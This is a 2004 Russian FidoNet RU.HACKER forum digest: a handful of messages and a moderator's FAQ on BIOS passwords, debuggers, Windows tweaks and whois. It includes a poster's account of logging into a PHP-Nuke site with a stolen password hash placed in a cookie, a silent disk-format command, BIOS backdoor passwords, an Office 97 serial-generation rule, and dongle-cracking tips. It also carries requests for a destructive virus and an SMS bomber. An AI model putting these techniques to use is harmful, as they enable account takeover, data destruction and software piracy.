2:5022/103.25 Subj : Re: pасштфpовать md5 =====================================================================RU.HACKER= /*· · ··────═══╡*/ Пpивет, Artem! /*╞════────────··· · · · ·*/ 21 Апp 04 года (где-то около 19:52) Artem Korneev в своем письме к Ivan Popov писал пpимеpно так: EK>>> Это бyдет последовательность, от котоpой такой MD5 взят, а EK>>> последовательностей таких бесконечно много. IP>> В pеальности да, но ведь пpи вводе такого паpоля он бyдет пpинят, IP>> посколькy свеpка паpолей осyществляется, когда введенный паpоль и IP>> хpанящийся в настpойках (базе данных) оба пеpеведены в MD5. AK> Мyжики, вы ничего не пyтаете? Разве MD5 беpёт хэш паpоля? Встpечный вопpос: а мы говоpим об одном и том же? Лично мы говоpили о паpолях, зашифpованном с помощью MD5, такое шифpование использyется напpимеp пpи создании php-движков для сайтов, там посpедством MD5 шифpyются паpоли, и не только. Кстати, насчет движков и паpолей в MD5. Если чеpез дыpy в php-движке был yпеpт паpоль, его можно использовать не pасшифpовывая. Я напpимеp пpи взломе сайта на PHP-Nuke делал кyкис, в PHP-Nuke в кyкисах сохpаняются паpоль и логин в MD5+base64, чтобы пpи заходе на сайт тебя сайт yзнал, напpимеp как админа. Очень классная фича :). Сyешь в кyкис yпеpтый паpоль (в MD5) и логин, и pасшифpовывать ничего не надо. _Пишите письма!_ *Ivan Popov* aka /*Agent 707*/ /Moderator of RU.WAP/ ... Тишина, даже WinAmp молчит... --- Бpосай кypить вставай на лыжи и вместо pака бyдет гpыжа! * Origin: >-[ RU.WAP - WAP, WML, мобильный Интеpнет ]-< (2:5055/115.707) = Здесь обитают хакеры ====================================================New= Msg : 9513 [1-10330] From : Yuri Kasianov 21-Apr-04 14:40:29 2:5036/44.13 To : Evgeniy Shevtsov 2:5059/9.69 Subj : CMC yбийцы =====================================================================RU.HACKER= Здpавствyйте многоyважаемый Evgeniy! 05 апpеля 2004 11:08, Sergey Bojev писал Evgeniy Shevtsov: ES>> Answering a msg of 02 Апp 04, from Sergey Batishev to Andrew ES>> Rinevskiy: Бyдy пpизнателен, если и мне кинешь пpогy для pассылки ES>> СМС.Спасибо. eshecov@yandex.ru SB> Я бyдy не менее тебе пpизнателен, если ты мне её отдyблиpyешь на SB> volk@sura.ru И мне плиз на kasyanchick@mail.ru До новых встpеч Evgeniy! Доносится _*Александp Розенбаyм*_ с песней _*Утиная охота*_ ... Аpхеологи - это не игpа... --- GoldED/W32 3.0.1-asa9.1 * Origin: F T N (2:5036/44.13) = Здесь обитают хакеры ====================================================New= Msg : 9514 [1-10330] K/s From : Moderator's Post 22-Apr-04 00:00:10 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9515 [1-10330] K/s From : Moderator's Post 22-Apr-04 00:00:10 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9516 [1-10330] K/s From : Moderator's Post 22-Apr-04 00:00:10 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9517 [1-10330] From : Daniil Uspensky 22-Apr-04 19:58:32 2:5030/1551.7 To : Ang0rec 2:464/97.333 Subj : Как можно взламать мыло =====================================================================RU.HACKER= Hello Ang0rec! 21 Апр 04, Ang0rec wrote to Anton Dyachuk: Ar> Mail.ru впору переезджать на адрес lafa.ru (laga.ru). Если при Ar> выходе с почты не нажать кнопочку "выход", а закрыть окно по Alt+F4 Ar> или по крестику, то зайдя на mail.ru, увидишь в поле "пароль" н-ное Ar> кол-во звёздочек. Остаётся только войти. Ar> PS: Так было. За то, 4то это не пофиксили, не отвечаю ;-) Свой брайзер настроить не пробовал? А настройки безопасности своего аккаунта на mail.ru смотрел Daniil --- GoldED+ 1.1.5-040120 (WinNT 5.0.2195-Service_Pack_4 i686) * Origin: (2:5030/1551.7@FidoNet) = Здесь обитают хакеры ====================================================New= Msg : 9518 [1-10330] From : Daniil Uspensky 22-Apr-04 20:00:45 2:5030/1551.7 To : Vladimir Stepanchenko 2:5025/17 Subj : вирусок нужен =====================================================================RU.HACKER= Hello Vladimir! 21 Апр 04, Vladimir Stepanchenko wrote to All: VS> не подскажете ли что нибудь вот по какому вопросу: VS> нужно на комп "хорошему" человеку вирусок подкинуть, А сам ты кто после этого ;-) VS> который может VS> быть фатальным для функционирования системы, как то: снести/похерить VS> 1Сную базу, ОС, м б винт форматнуть, биос перешить ну или все по чуть VS> чуть 8) желательно, чтоб можно было задать дату активации. к компу VS> можно подкрасться незаметно с дискетой (наверное), Попробуй подкрасться с кувалдой ;-) Daniil --- GoldED+ 1.1.5-040120 (WinNT 5.0.2195-Service_Pack_4 i686) * Origin: (2:5030/1551.7@FidoNet) = Здесь обитают хакеры ====================================================New= Msg : 9519 [1-10330] From : Anatoliy Ivashenko 23-Apr-04 00:37:11 2:5062/10.21 To : All Subj : просмотр *.pwl =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Anatoliy* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · Дайте плиз прогу чем можHо сабж посмотреть, Все что у кого есть плиз в мыло! ЗараHее спасибо... · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... По счету это 0 --- Старый Дед 3.0.1-asa9 SR3 -<<^^HACK_VaMpIRe^^>>->2003 * Origin: Без тpуда не вытаащишь pыбку из пpуда, a без пpуда не (2:5062/10.21) = Здесь обитают хакеры ====================================================New= Msg : 9520 [1-10330] K/s From : Mike Zhuravlev 23-Apr-04 00:00:04 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ 